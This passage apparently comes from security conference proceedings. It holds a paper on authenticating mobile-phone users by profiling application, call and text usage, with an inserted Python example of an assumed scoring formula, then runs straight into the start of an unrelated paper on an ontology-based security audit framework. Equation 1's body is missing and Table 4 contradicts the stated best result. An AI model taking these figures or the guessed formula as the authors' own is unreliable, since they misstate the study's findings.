The modern mobile handheld device is capable of providing many services through a wide range of applications over multiple networks as well as on the handheld itself, such as: voice calling through the service provider’s network, Internet surfing via Wi-Fi hotspots, video conferencing through a 3G connection, road navigation by GPS (Global Positioning System), picture sharing by using Bluetooth pairing, data synchronising with laptop/desktop computers, document creation and modification, and entertainment (i.e. playing music). Indeed, the functionality and interconnectivity of mobile devices only tends to increase with time.<br />
While people enjoy the convenience provided by mobile devices, there are also threats which could make their life less comfortable, such as the loss or theft of the device, service fraud, SIM (Subscriber Identity Module) card cloning, mobile malware, information disclosure, DoS (Denial-of-Service) attacks, Smishing (SMS (Short Message Service) phishing) and Vishing (Voice phishing). Mobile malware could harm the mobile phone in a variety of ways, such as infecting files and damaging user data. Since the first one was discovered in 2004, more than 106 malware families with 514 variants have been identified (Securelist 2010). Smishing and Vishing are new types of phishing attacks which are performed by utilising text messaging and telephone calls (FBI 2010). If the phone owner is fooled, their personal information can be exposed and abused.<br />
With the aim of countering mobile threats, a number of security mechanisms have been developed both on the mobile device and on the service provider’s network. The PIN (Personal Identification Number) based authentication method is the most widely deployed approach on mobile devices. Although widely used, many users do not employ the technique properly (i.e. never changing the PIN) (Clarke and Furnell 2005; Kurkovsky and Syta 2010). Mobile antivirus software and firewall applications are mainly deployed for detecting malware presence and blocking unwanted network traffic. Nonetheless, obtaining the latest virus signatures and updating rules for network traffic are not easy tasks; furthermore, their ability to detect user-related activities is limited. As a mobile device has limited computing power, more sophisticated mechanisms, such as IDS (Intrusion Detection System), are primarily deployed on the service provider’s network. These systems monitor the mobile users’ calling and migration activities to detect telephony service fraud. However, given that the modern mobile device has the ability to access several networks simultaneously and accommodate a wide range of services, existing network-based security mechanisms are unable to provide comprehensive protection for the mobile handset. This paper focuses upon presenting the findings from a feasibility study into utilising a host-based behavioural profiling approach to identify mobile device misuse, and providing continued and transparent protection for mobile devices.<br />
307
Fudong Li et al.<br />
This paper begins by introducing various mobile device applications, mobile threats, and general security mechanisms, and continues to describe the current state-of-the-art. A series of experimental studies on two aspects of users’ application usage (application-level and application-specific) are presented in Section 3, with the following section describing the results. The paper then proceeds to discuss the results and concludes by highlighting the future direction of the research.<br />
2. Behaviour-based mobile device security mechanisms
Research in mobile device security has been an established area for more than 10 years, with a substantial amount of activity focused upon authentication, antivirus, firewalls and IDS. Of particular interest, however, is the research that has been undertaken into behaviour-based mechanisms. This research falls primarily into two categories: behaviour-based network mechanisms and behaviour-based host mechanisms.
2.1 Behaviour-based network mobile security mechanisms
Research into mobile behaviour-based mechanisms started around 1995, focusing mainly on IDS. These mobile IDSs monitor user calling and migration behaviour over the service provider's network and detect telephony service fraud (Gosset 1998; Samfat and Molva 1997; Boukerche and Nitare 2002). One particularly successful approach develops a profile of a user's calling history over a period of time and compares this historical profile against current usage, with deviations above a predefined threshold raising an alarm. Various supervised and unsupervised classifiers were developed to deal with different attributes of the problem space (known and unknown attack vectors), and the resulting systems were combined so that the strengths of each approach could be capitalised upon (Gosset 1998).
Research has also focused on the use of geo-location information as a basis for detecting misuse. Based upon the hypothesis that people have predictable travelling patterns, a migration-based mobile IDS monitors a user's location activities to detect abnormal behaviour. The user's location can be obtained either from the mobile cellular network (i.e. cell ID) or via a GPS link (i.e. longitude and latitude). By recording the user's location information over a period of time, a mobility profile can be generated. When a mobile user carries their device from one location to another, the probability of that movement under the profile is calculated and compared against a threshold; a sufficiently improbable movement is treated as an intrusion. A number of studies have profiled user migration activities, including Buschkes et al (1998), Hall et al (2005) and Sun et al (2006).
By studying a user's calling or location activities, behaviour-based IDSs can achieve a high detection rate and offer the ability to detect unforeseen attacks. In addition, as the classification and identification procedures are processed by the network service provider, no additional computational power is required from the mobile device. This has traditionally been critical for mobile devices, as they have limited processing power and storage compared with traditional desktop computers. Nonetheless, if these behaviour-based systems worked together, monitoring the mobile user's action (i.e. calling a friend) while knowing where the action is taken (i.e. at home), overall system performance could arguably be increased.
2.2 Behaviour-based host mobile security mechanisms
Existing host behaviour-based mobile security systems are mainly authentication-based. These systems usually employ one or more characteristics of a user's behaviour to assess the legitimacy of the current user; techniques include keystroke analysis and gait recognition.
Keystroke analysis based authentication systems monitor users' keystroke patterns, typically the inter-keystroke latency and hold time. The authentication can be performed in two modes: static (text dependent) and dynamic (text independent). In the static mode, users are authenticated when a specific word or phrase has been entered; for instance, the system authenticates the user as they enter a PIN to unlock the device. In the dynamic mode, a user's legitimacy is checked based upon their typing speed and rhythm, independent of what they type; for example, authentication occurs transparently while the user composes a text message. Previous work in this area includes Clarke and Furnell (2006), Buchoux and Clarke (2008) and Campisi et al. (2009). With an average experimental EER of 13%, keystroke analysis based authentication systems can be deployed in practice to provide extra security for a mobile device. However, this method is only practical in scenarios with sufficient keystroke activity (activities such as reading a document or viewing a picture would be unlikely to generate sufficient data to validate a user's identity).
Gait recognition is based upon the theory that people can be discriminated by how they walk while carrying their mobile device (Boyd and Little 2005). When a user carries their mobile device in their trouser pocket, the user's gait information can be collected (Derawi et al 2010). The gait data is then compared with an existing template: if it matches, the user is considered legitimate; otherwise, they are treated as an intruder. The experimental results show that an EER of 20.1% can be achieved, which demonstrates the possibility of deploying this method on a mobile handset. However, as the authentication process relies heavily on gait information, the device could be left unprotected when gait information is not available, for example when the user is sitting in the office.
2.3 Summary of current mobile behaviour security mechanisms
The aforementioned literature suggests that existing behaviour-based network IDSs can detect calling service fraud attacks. However, in practice the mobile network operator can only monitor calling and migration behaviours, rather than examining every single mobile service. The existing host-based behavioural authentication systems can only provide periodic security, when the user interacts with the device in the desired manner (e.g. when the keypad is touched or the device is carried in the pocket). Therefore, none of the current research in mobile behaviour security mechanisms provides comprehensive and continuous protection against device misuse. Hence, a mobile security mechanism which can offer detection across a wider range of services and connections on the mobile device is needed.
3. Behaviour profiling for transparent authentication for mobile devices
The previous section shows that network-based behavioural security mechanisms can only monitor network-based services through the service provider's network. As current mobile devices have the ability to access multiple networks simultaneously, a host-based approach must be taken into consideration when designing the new system. Given the difficulty of obtaining and updating signatures and the inability of signature-based methods to detect unforeseen threats, a behaviour profiling technique should be taken. As application usage represents an overview of how the user interacts with the device (Miettinen et al 2006), and given the lack of research regarding the discriminatory nature of application usage within a mobile device environment, an experiment was developed focusing upon two aspects: application-level and application-specific user interactions.
3.1 Experiment procedure
The experiment employed a publicly available dataset provided by the MIT Reality Mining project (Eagle et al 2009). The dataset contains 106 participants' mobile phone activities from September 2004 to June 2005. Using preinstalled logging software, various mobile data attributes were collected from the participants' Nokia 6600 mobile phones. As shown in Table 1, the MIT Reality dataset contains a large and varied selection of information which covers two levels of application usage: application-level information (general applications) and application-specific information (voice call and text message).
Table 1: The MIT Reality dataset
Activity               Number of logs   Information contained
General applications   662,393          Application name, date, time of usage and cell ID
Voice call             54,440           Date, time, number called, duration and cell ID
Text message           5,607            Date, time, number texted and cell ID
3.1.1 Application-level analysis
By default, a number of common applications are preinstalled on the mobile device by the manufacturer, such as the phonebook, clock and voice calling. With increased processing power and storage space, and almost 15,000 new mobile applications becoming available on the market every month (Distimo 2010), mobile users have the freedom to install additional applications on the device. From a high-level perspective, the general use of applications can provide a basic level of information on how the mobile user utilises the device, such as the name of the application and the time and location of usage. Given the hypothesis that mobile users utilise their mobile applications differently (i.e. two users utilise different applications in different time periods and at different locations), an experiment was devised to explore the possibility of utilising application-level information for discriminating mobile device users.
3.1.2 Application-specific analysis
The second experiment focused upon utilising further information about the applications. Within many applications the user connects to data that could provide additional discriminatory information; for instance, when surfing the Internet, the browser can capture all the URLs an individual accesses. Unfortunately, due to limitations of the dataset (collected before data-based applications became prevalent), the range of application-specific analysis that could be undertaken was limited to telephony and text messaging.
The prior literature shows that calling behaviour has been studied several times in a network-based environment, with results demonstrating the ability to discriminate mobile phone users. Within a mobile host environment, the availability of calling features changes slightly; for example, the IMSI (International Mobile Subscriber Identity) is not a useful feature in a host-based solution. Furthermore, although several studies suggested utilising a user's location information, it has never been treated as a calling feature. Therefore, it was of interest to identify the effectiveness of a new set of calling features which includes the user's location information.
Text messaging is amongst the most widely used applications on a mobile device, with the UK alone sending more than 100 billion text messages in 2010 (Ofcom 2010). Despite this high volume of usage, little research has been undertaken to show how text messages may be used to detect abnormal usage in the mobile environment. Hence, it was also deemed important to discover the possibility and usefulness of employing text messaging to detect anomalous mobile user behaviour.
For methodological reasons, namely to maximise the number of participants within a reasonable timeframe, the experiment employed 76 participants whose activities occurred during the period 24/10/2004 to 20/11/2004. As not all participants started or finished the experiment at the same time, it was imperative to isolate a sub-section of the dataset that maximised the number of participants and the available data. The methodology employed two types of profiling technique: static and dynamic. For static profiling, each individual dataset was divided into two halves: the first half was used for building the profile, and the other half was utilised for testing. For dynamic profiling, the profile contained 7, 10 or 14 days of the user's most recent activities; the evaluation was carried out on the same sub-dataset as for the static experiment in order to provide a meaningful comparison. Given the highly variable nature of the input data, a smoothing function was applied: rather than acting on each individual result, the smoothing function permitted the system to make a decision only after a number of results were present (similar to a winner-takes-all decision-based biometric fusion model). The basis for this approach was derived from the descriptive statistics produced when analysing the data and the large variances observed. A dynamic approach therefore seemed sensible to cope with the changing nature of the profile. Based on the premise that the historical profile can be used to predict the probability of a current event, the formula illustrated in Equation 1 was devised. The equation includes a weighting factor (W_i) to allow more discriminative features to have a greater contribution to the resulting score than less discriminative features. Moreover, the equation ensures that all outputs are bounded between 0 and 1 to assist in defining an appropriate threshold.
Equation 1: Alarm if: ≥ Threshold
Where:
i = the features of one chosen application (e.g. dialled number for the telephony application)
x = the value of Feature_i (e.g. office telephone number and home telephone number)
M = total number of values for Feature_i
N = total number of features
W_i = the weighting factor associated with Feature_i
Threshold = a predefined value set for each individual user
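The profiling and evaluation procedure described above, worked through as an added example (this is not code from the paper). The body of Equation 1 is not reproduced in this extract, so the score implemented here is an assumed instantiation that satisfies the stated definitions: the relative frequency of each feature value in the historical profile stands in for its probability, the weights W_i sum to 1, the output is bounded between 0 and 1, and an alarm is raised when the smoothed score reaches the per-user threshold. The example also implements both profiling modes (a static first-half/second-half split and a dynamic profile built from the most recent K days before each event), smoothing by averaging n log entries into one decision, and an EER sweep over thresholds. The telephony logs, the feature names (number, cell), the equal weights and the two impostors are all constructed for the example; the "colleague" impostor shares the user's cell IDs but dials different numbers, which is the misuse scenario Section 5 warns that location alone cannot catch.

```python
"""Behaviour-profiling scorer: added example, not the paper's code.
The page does not reproduce the body of Equation 1, so the score below is an
ASSUMED instantiation that fits the stated definitions: per-feature weights W_i
summing to 1, a result bounded in [0, 1], alarm when the (smoothed) score is
>= a per-user threshold. All log data is constructed for the example."""
from collections import Counter, defaultdict
from datetime import date, timedelta


def build_profile(logs, start=None, end=None):
    """Count feature values over the log entries whose day lies in [start, end].
    logs: list of (day, {feature_name: value}). Returns (counts, total)."""
    counts, total = defaultdict(Counter), 0
    for day, feats in logs:
        if (start is None or day >= start) and (end is None or day <= end):
            for name, value in feats.items():
                counts[name][value] += 1
            total += 1
    return counts, total


def anomaly_score(profile, event, weights):
    """score = 1 - sum_i W_i * P_i(x_i), where P_i(x) is the relative frequency
    of value x for feature i in the profile. Because the weights sum to 1 the
    result lies in [0, 1]; a value never seen contributes 0, so an event with
    nothing in common with the profile scores 1.0 (as does an empty profile)."""
    counts, total = profile
    assert abs(sum(weights.values()) - 1.0) < 1e-9, "weights must sum to 1"
    if total == 0:
        return 1.0
    return 1.0 - sum(w * counts[f][event[f]] / total for f, w in weights.items())


def smooth(scores, n):
    """Fuse n consecutive scores into one decision by averaging (assumed form of
    the paper's smoothing): one decision per n events and fewer single-event
    spikes, but an intruder gets n events before the first decision."""
    return [sum(scores[k:k + n]) / n for k in range(0, len(scores) - n + 1, n)]


def equal_error_rate(genuine, impostor):
    """Sweep the threshold over every observed score. FRR = share of genuine
    scores that alarm (>= t); FAR = share of impostor scores that do not (< t).
    Returns (EER, t) at the threshold where the two rates are closest."""
    best_gap, best = 2.0, (1.0, 0.0)
    for t in sorted(set(genuine) | set(impostor) | {1.0}):
        frr = sum(s >= t for s in genuine) / len(genuine)
        far = sum(s < t for s in impostor) / len(impostor)
        if abs(far - frr) < best_gap:
            best_gap, best = abs(far - frr), ((far + frr) / 2, t)
    return best


def evaluate(user_logs, impostor_logs, weights, n_entries=1, profile_days=None):
    """Static mode (profile_days=None): profile from the first half of the
    user's days, test on the second half. Dynamic mode: each test event is
    scored against the user's own events from the profile_days days before it.
    Impostor events are replayed on the same days against the same profiles."""
    days = sorted({d for d, _ in user_logs})
    split = days[len(days) // 2]
    static = build_profile(user_logs, end=split - timedelta(days=1))

    def profile_for(day):
        if profile_days is None:
            return static
        return build_profile(user_logs, start=day - timedelta(days=profile_days),
                             end=day - timedelta(days=1))

    def scores(logs):
        return [anomaly_score(profile_for(day), feats, weights)
                for day, feats in logs if day >= split]

    return equal_error_rate(smooth(scores(user_logs), n_entries),
                            smooth(scores(impostor_logs), n_entries))


def make_logs(numbers, cells, days=28, per_day=3, first=date(2004, 10, 24)):
    """Constructed telephony logs (dialled number, cell ID); the two value
    lists cycle independently so the frequencies are easy to check by hand."""
    return [(first + timedelta(days=k // per_day),
             {"number": numbers[k % len(numbers)], "cell": cells[k % len(cells)]})
            for k in range(days * per_day)]


WEIGHTS = {"number": 0.5, "cell": 0.5}            # equal weights, as in Section 4.2
USER = make_logs(["0123", "0123", "0456", "0789"], ["c1", "c1", "c2"])
COLLEAGUE = make_logs(["0999", "0888"], ["c1", "c1", "c2"])   # same cells, own contacts
STRANGER = make_logs(["0999", "0888"], ["c9"])                # nothing in common

if __name__ == "__main__":
    for label, imp in (("stranger", STRANGER), ("colleague", COLLEAGUE)):
        for n in (1, 3):
            for k in (None, 14):
                eer, t = evaluate(USER, imp, WEIGHTS, n_entries=n, profile_days=k)
                mode = "static" if k is None else f"dynamic {k}d"
                print(f"{label:9s} {mode:11s} {n} entries: EER={eer:.3f} at t={t:.3f}")
```

With these constructed logs the stranger is separated perfectly (every stranger event scores 1.0 because neither its number nor its cell appears in the profile), while the colleague reaches an EER of 1/12: the cell feature contributes the same probability mass for the colleague as for the owner, so only the dialled number separates them. That is the point made in Section 5 about location falling within the legitimate user's profile, and it is why the per-feature weights W_i exist. The smoothing trade-off is also visible: with n_entries=3 the scores are steadier, but a decision is only reached every three calls.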
4. Experimental results
4.1 Application-level profiling
For the general applications, the following features were extracted from the dataset: application name, date of initiation and location of usage. A total of 101 individual applications were used by the chosen 76 users during the chosen period, giving a final application-level sub-dataset of 30,428 log entries. Among these 101 applications, the phonebook, call logs and camera were used by all participants. Using the proposed equation, a final set of EERs (Equal Error Rates) for users' application-level usage is presented in Table 2. The best EER, 13.5%, was obtained using the dynamic profile technique with 14 days of user activity and 6 log entries per decision. In comparison, the worst performance (24.0%) was obtained using the dynamic profile technique with 7 days of user activity and 1 log entry.
Table 2: Experimental results for application-level applications (EER by number of log entries per decision)
Profile technique   1       2       3       4       5       6
Static 14 days      21.1%   17.4%   16.3%   14.9%   14.2%   13.6%
Dynamic 14 days     21.1%   17.3%   16.0%   14.5%   13.9%   13.5%
Dynamic 10 days     22.1%   17.8%   16.2%   14.6%   14.4%   13.7%
Dynamic 7 days      24.0%   19.4%   17.6%   15.9%   15.3%   14.4%
Selected experimental results for the best configuration of application-level usage are shown in Table 3. The top 3 and bottom 3 users' EERs represent the best and worst performance respectively. Further analysis of the results shows that 84% of all users have an EER of less than 20%.
Table 3: Selected users' performance for application-level applications with dynamic 14 days and 6 log entries
User_ID   EER
71        0%
46        0%
12        0.5%
66        37.5%
2         39.3%
68        51.6%
4.2 Application-specific profiling
4.2.1 Telephony
For the telephone call application, a subset of 71 of the 76 participants used the application during the chosen period. During the same period, 2,317 unique telephone numbers were dialled and a total of 13,719 calls were made. Through iteration and optimisation, the following features were chosen for each log: the telephone number, date and location of the call. Using the aforementioned formula with the selected features (all features were given the same weighting factor), the final set of results is shown in Table 4. The best result is an EER of 5.4%, achieved using the dynamic profile technique with the user's most recent 14 days of activity and 6 log entries.
Table 4: Experimental results for telephone call application (EER by number of log entries per decision)
Profile technique   1       2      3      4      5      6
Static 14 days      9.6%    9.1%   7.9%   7.2%   4.3%   6.4%
Dynamic 14 days     8.8%    8.1%   6.4%   6.4%   6.3%   5.4%
Dynamic 10 days     9.6%    8.6%   8.1%   7.2%   6.9%   6.0%
Dynamic 7 days      10.4%   8.8%   8.5%   7.3%   7.0%   6.2%
A selection of experimental results for the best set-up of the telephone call application is presented in Table 5. The top 3 and bottom 3 users represent the best and worst performance respectively. Furthermore, 81.7% of users have an EER of less than 10%.
Table 5: Selected users' performance for telephone call application with dynamic 14 days and 6 log entries
User_ID   EER
23        0%
43        0%
61        0%
64        20.6%
50        23.1%
8         39.5%
4.2.2 Text messaging
For the text messaging experiment, 22 of the 76 participants had text messaging activity during the chosen period. The text messaging dataset contains 1,382 logs and 258 unique texting numbers. For each text log, the following features were extracted: receiver's telephone number, date and location of texting. Because certain participants had a limited number of text messaging logs, a maximum of 3 log entries were treated as one incident. Using the aforementioned formula and all text message features (all features were given the same weighting factor), the final results for the text messaging application are shown in Table 6. The best result was an EER of 2.2%, acquired using the dynamic profile method with 14 days of the user's activities and 3 log entries. Also, performance improves considerably from 1 log entry to 2 log entries across all profiling techniques.
Table 6: Experimental results for text messaging application (EER by number of log entries per decision)
Profile technique   1       2      3
Static 14 days      7.0%    4.3%   3.6%
Dynamic 14 days     5.7%    2.6%   2.2%
Dynamic 10 days     8.3%    4.1%   3.7%
Dynamic 7 days      10.7%   5.7%   3.8%
Table 7 shows a group of users' performance for the best configuration of the text messaging application. The top 3 and bottom 3 users' EERs represent the best and worst performance respectively. In addition, 95.5% of all users have an EER smaller than 10%.
Table 7: Selected users' performance for text messaging application with dynamic 14 days and 3 log entries
User_ID   EER
13        0%
14        0%
18        0.2%
4         5.3%
2         8.4%
17        13.1%
5. Discussion
The application name and location have proved to be valuable features that provide sufficient discriminatory information to be useful in authentication. However, whilst this might identify many misuse scenarios, it would not necessarily identify all cases of misuse, particularly those where a colleague temporarily misuses the device, as the location information is likely to fall within the same profile as that of the authorised user. Care is therefore required in interpreting these results. The intra-application approach should help to identify this type of misuse specifically.
In general, dynamic profiling achieved slightly better performance than static profiling. This is reasonable, as a dynamic profile contains a user's most recent activities and hence yields more accurate detection. Furthermore, with a longer training period the performance also improved; hence, an increased number of days (e.g. 18 or 22 days) of user activity as the training set should be examined to find the optimum. Nonetheless, the literature suggests that users do change their usage patterns over a long period of time: a study by Flurry (2009) states that users keep only 67% of their applications over a 30-day period. Moreover, storage and processing costs should also be taken into consideration with larger training sets. When the smoothing function treated more log entries as one incident, the performance also improved. The smoothing function reduces the impact any single event might have and takes a more holistic approach to monitoring for misuse. The disadvantage of this approach is that the system takes longer to make a decision; hence, an intruder has more opportunity to abuse the system, and a certain amount of abuse could be missed by the security control.
Limitations in the dataset are also likely to have created certain difficulties. As the dataset was collected in 2004, the number of mobile applications available for users to choose from was limited; this resulted in a large similarity in application-level usage between mobile users and difficulty for any classification method. In contrast, in the early part of 2010 there were around 200,000 mobile applications available (Distimo 2010). As mobile users have more options, their application-level usage would arguably differ more, making it easier to discriminate mobile users through their application-level usage.
As shown in Table 4, the performance of the telephony application is very good, with an EER less than half that of application-level profiling. This reinforces the hypothesis that knowing both the application and what the user does with it significantly improves the chance of identifying individual users. Moreover, mobile users had a far larger set of telephone contacts (the numbers they can dial) than applications, which also makes the classification process easier because there are more identifiable data points from which to discriminate. In comparison with other biometric authentication techniques such as keystroke analysis, which has an average EER of 8% (Clarke and Furnell 2006), the telephony experiment is within the same category of performance.
As presented in Table 6, the results from the text messaging application were even better than those achieved by the telephone call application, albeit with a smaller dataset. This may be because people only send text messages to very close contacts. Although only 30% of the participants used the text messaging application in 2004, the situation has changed considerably: for the UK alone, the volume of text messaging traffic has increased by 290% since 2004 (Ofcom 2010). This indicates that the text messaging based authentication method could serve a good proportion of the mobile user population.
From the results presented in this paper, it can be shown that both application-level and application-specific information can be used to authenticate mobile users. In addition, although it is more difficult to profile certain users, more than 81% of all users' performance was within the bounds of a behaviour-based biometric. The dynamic profiling technique provides the opportunity to develop a more meaningful profile of user activities. This does, however, raise issues with regard to template ageing and to ensuring that the samples used in creating the template are all legitimate, which will need to be addressed. Furthermore, in comparison with previous research, which used computationally complex neural networks as the classification method (Li et al 2009; Li et al 2010), this approach employs a lightweight mathematical formula which saves a significant amount of processing power and storage space; this is essential for handheld mobile devices, as they have limited processing power and storage space.
6. Conclusions
The experiments show that, with EERs of 5.4%, 2.2% and 13.5% for telephony, text messaging and general application usage respectively, these techniques are viable for a behaviour-based authentication mechanism within the mobile environment. The authentication process could be carried out in the background while mobile users utilise their applications; if several abnormal activities occurred within a fixed time frame, further security methods would be initiated according to the level of the incident.
Future work will focus upon designing an authentication architecture that can accommodate the aforementioned behaviour-based authentication techniques. As the architecture works behind the scenes, little attention would be required from the mobile user, and intervention would only be needed when anomalous application usage occurs. Hence, such an architecture would provide transparent and continuous protection for users. Furthermore, an operational system which supports identity verification will be developed for the purpose of evaluation.
Description of a Practical Application of an Information Security Audit Framework
Teresa Pereira 1 and Henrique Santos 2
1 Polytechnic Institute of Viana do Castelo, Valença, Portugal
2 University of Minho, Guimarães, Portugal
tpereira@esce.ipvc.pt
hsantos@dsi.uminho.pt
Abstract: Organizations are increasingly relying on information systems to enhance business operations, facilitate management decision-making, and deploy business strategies. This dependence has increased in current business environments, where a variety of transactions involving the exchange of information and services are accomplished electronically. Technological advances, the increasing use of the Internet, the emergence of Internet-enabled services and the current audit environment have promoted a growing interest in the continuous auditing of information system security, in order to ensure the reliability of organizational information systems. However, the current approaches available to assist the auditor in performing a security audit are limited in the concepts they use and are increasingly dependent on the experience and knowledge of the auditor. This paper presents a framework, based on a conceptual model, that assists the auditor in conducting an audit in the information system security domain. The model contains the semantic concepts, their relationships and axioms, defined for a subset of the information security domain. This conceptual approach promotes the standardization of the terminology used in the information security domain and improves the information system security audit process within organizations. A comparison with the currently available approaches to auditing information systems is presented as well.
Keywords: auditing information system security, information system security, ontology, COBIT, ITIL, concepts
1. Introduction
Nowadays organizations are increasingly relying on information systems to achieve business objectives. Business performance involves the full investment of business process owners, since they have total responsibility for all issues regarding the business process, in particular providing adequate security controls. As a result, increasing emphasis has been placed on internal security controls in organizations, in order to reduce risks to an acceptable level. An information system security audit is the process of gathering and evaluating evidence based on the evaluation of the information system's performance. Furthermore, it makes it possible to determine whether the information system promotes the effective achievement of business objectives and whether system resources are used in an efficient manner. Therefore auditors are continuously confronted with the need to communicate their opinion on internal control to management. In this context it is fundamental for auditors to have a framework that assists them in substantiating their view on internal controls.
The development of information systems security auditing frameworks is the result of joint studies by IT experts in response to the growing significance of best practices to the IT industry and the need for IT managers to better understand the value of IT best-practice frameworks and how to implement them. The most effective best practices should be applied within the business context, focusing on their use to provide the most benefit to the organization. The two best-known frameworks are the IT Infrastructure Library (ITIL) and the Control Objectives for IT (COBIT), which support a broad range of management services and have been implemented by thousands of organizations. In this paper a comparison is established between these two methodologies and a newly developed framework, which is based on the established security standards ISO/IEC_JTC1 1 (ISO/IEC_JTC1 2005) and implemented to assist the auditor in performing regular audits of the organizational information system security. The paper is structured as follows: section 2 briefly introduces the COBIT framework; section 3 describes ITIL; section 4 presents the developed framework to audit information system security, based on the ontology structure; section 5 compares COBIT and ITIL with the developed framework; conclusions and future work are presented in section 6.
1 International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC), Joint Technical Committee (JTC 1)
2. COBIT
COBIT is published by the IT Governance Institute (ITGI) 2 and positioned as a high-level governance and control framework. ITGI is a not-for-profit research organization affiliated with the Information Systems Audit and Control Association (ISACA) and focused on IT governance, assurance and security. ITGI undertakes research and publishes COBIT, an open standard and framework of controls and best practice for IT governance which provides guidelines on what can be done in an organization in terms of control activities, measurement and documentation of processes and operations.
The primary focus of COBIT is on aligning the use of IT with the achievement of organizational goals. The combination of business and IT goals promoted by the COBIT framework enables the monitoring of the information system.
The COBIT framework consists of 34 high-level control objectives, contains over 300 detailed IT controls and is validated to reach a balance between IT risks and investments in IT controls. The control objectives have been organized into a hierarchy of processes and domains that are designed to help bring alignment of business and IT objectives, by identifying the requirements for IT resources and information associated with the detailed control objectives. IT processes are grouped into four domains: planning and organization, acquisition and implementation, delivery and support, and monitoring.
The conceptual COBIT framework can be approached from three points: (1) information criteria, (2) IT resources and (3) IT processes. These three points are depicted in the COBIT Cube.
Figure 1: The COBIT Cube, source (ITGI 2000)
To satisfy business objectives, information needs to conform to certain control criteria, which COBIT refers to as business requirements for information. Based on the broader quality, fiduciary and security requirements, seven distinct, certainly overlapping information criteria are defined as follows (ITGI 2000):
Effectiveness deals with information being relevant and pertinent to the business process as well as being delivered in a timely, correct, consistent and usable manner.
Efficiency concerns the provision of information through the optimal use of resources.
Confidentiality concerns the protection of sensitive information from unauthorised disclosure.
Integrity relates to the accuracy and completeness of information as well as to its validity in accordance with business values and expectations.
Availability relates to information being available when required by the business process now and in the future. It also concerns the safeguarding of necessary resources and associated capabilities.
Compliance deals with complying with those laws, regulations and contractual arrangements to which the business process is subject, i.e., externally imposed business criteria.
Reliability relates to the provision of appropriate information for management to operate the entity and for management to exercise its financial and compliance reporting responsibilities.
2 www.itgi.org
IT resources are managed by IT processes to achieve goals that meet the business requirements of organizations. This principle of the COBIT framework is illustrated in Figure 1. The IT resources identified in COBIT can be defined as follows (ITGI 2000):
Data are objects in their widest sense, structured and non-structured, graphics, sound, etc.
Application Systems are understood to be the sum of manual and programmed procedures.
Technology covers hardware, operating systems, database management systems, networking, multimedia, etc.
Facilities are all resources to house and support information systems.
People include staff skills, awareness and productivity to plan, organise, acquire, deliver, support and monitor information systems and services.
From the point of view of control and information systems audit, COBIT provides the Audit Guidelines, a complementary tool to facilitate the application of the COBIT Framework and Control Objectives within audit and assessment activities. The purpose of the Audit Guidelines is to provide a structure for auditing and assessing controls based on generally accepted audit practices that fit within the overall COBIT scheme. The COBIT Audit Guidelines enable the auditor to review specific IT processes against COBIT's recommended control objectives, to help assure management where controls are sufficient or to advise management where processes need to be improved (ITGI 2000). Therefore the IT process is audited by:
Obtaining an understanding of business requirements, related risks, and relevant control measures;
Evaluating the appropriateness of stated controls;
Assessing compliance by testing whether the stated controls are working as expected, consistently and continuously;
Substantiating the risk of control objectives not being met by using analytical techniques and/or consulting alternative sources.
The audit guidelines assist the auditor in providing assurance that the process is actually under control and that the information requirements enable the achievement of business objectives.
3. ITIL
ITIL was developed by the British government between 1989 and 1995 as a best-practice framework for IT service management. ITIL was published by Her Majesty's Stationery Office (HMSO) in the UK on behalf of the Central Communications and Telecommunications Agency (CCTA), now included within the Office of Government Commerce (OGC 3). ITIL V2 became universally accepted and is now used in several countries by many organizations as the basis for effective IT service provision. In 2007 a new version of ITIL arose, resulting in a consolidated third version of ITIL. The main mechanism addressed by ITIL is the concept of a service, which is defined in ITIL V3 as follows: "A service is a means of delivering value to customers by facilitating outcomes customers want to achieve without the ownership of specific costs and risks" (ITIL 2007). All service solutions and activities should be driven by business needs and requirements. In this context service solutions and activities must reflect the strategies and policies of the organizational service provider. ITIL is based on defining best-practice processes for IT service management and support, rather than on defining a broad-based control framework. The key activity is the definition of continual service improvement, which drives the maintenance of value delivery to the customer.
IT service management is concerned with planning, sourcing, designing, implementing, operating, supporting and improving IT services that are appropriate to business needs. The role of the ITIL framework is to describe approaches, functions, roles and processes upon which organizations may base their own practices, and to give guidance at the lowest level that is generally applicable.
ITIL V3 service management is broken into five distinct phases (ITIL 2007) (Woods 2010):
ITIL Service Support;
ITIL Service Delivery;
ITIL Transition;
ITIL Operation;
ITIL Continual Service Improvement.
3 www.ogc.gov.uk
4. A framework developed to audit information system security, based on an ontology
The establishment of the ISO/IEC_JTC1 standards promoted the standardization of the semantic concepts defined in the information security domain. The correct understanding and identification of those concepts is the primary requirement to be considered in performing a proper examination of the information system security effectiveness, and further in identifying and characterizing a security incident that has occurred, as well as in estimating its impacts. The proposed conceptual framework is based on the security standard ISO/IEC_JTC1 and intends to assist the organization, firstly, to precisely determine what should be protected (the assets) and their weaknesses (vulnerabilities) involved in their daily activity; secondly, to assess which vulnerabilities can be exploited by an attack, as well as the threats that might materialize in an attack; and finally, to evaluate the efficiency and effectiveness of the policy and controls implemented, in order to determine whether they are being correctly implemented or need any adjustment (Pereira & Santos 2010a).
Figure 2 illustrates the proposed conceptual framework, presenting its three nuclear concepts: attack, threat and assets. The auditor can select the concept from which he/she intends to start the auditing process, and proceed to the directly related concepts. Each concept contains a list of elements that are linked to the other concepts, conforming to the hierarchical structure of the semantic concepts defined in the ontology (Pereira & Santos 2010b). These three concepts, rather than the others, were included in the front-end of the framework due to the nature of the audit operation which the auditor intends to perform.
Figure 2: Print screen of the developed framework
Traditionally, a security audit is conducted once an incident has occurred (a reactive audit followed by a corrective one), that is, when an asset has been compromised. In this case, an audit is requested in order to determine the source of the attack and how the incident happened, proceeding with the adequate corrective mechanisms. However, a security audit is not only about investigating security break-ins, but rather about mitigating recognized threats, in order to ensure: (1) security compliance; (2) the security of critical assets; (3) that the right controls are in the right place. In this last view a security audit is performed in the context of the security risk management process, and aims to produce or evaluate a security policy.
Being guided by the main concepts and their relationships defined by an ontology, the proposed framework intends to assist organizations to understand, prepare and perform security audits by themselves. This framework does not focus exclusively on the technical controls involved in information security, but enforces procedures and practices to assist organizations in maintaining consistently high levels of useful and good quality information concerning their information security systems.
Within the ontology, each concept is mapped to real subjects. For example, if the auditor starts to conduct the audit through the attack concept, usually it means that a security incident occurred and the auditor must perform an in-depth analysis of the attack and analyse the implemented controls, in order to detect the security breach. The related concepts represented in the ontology are illustrated in Figure 3 and briefly described:
The vulnerability exploited by the attacker;
The assets affected;
The security properties that were compromised; and
The controls implemented to detect the attack.
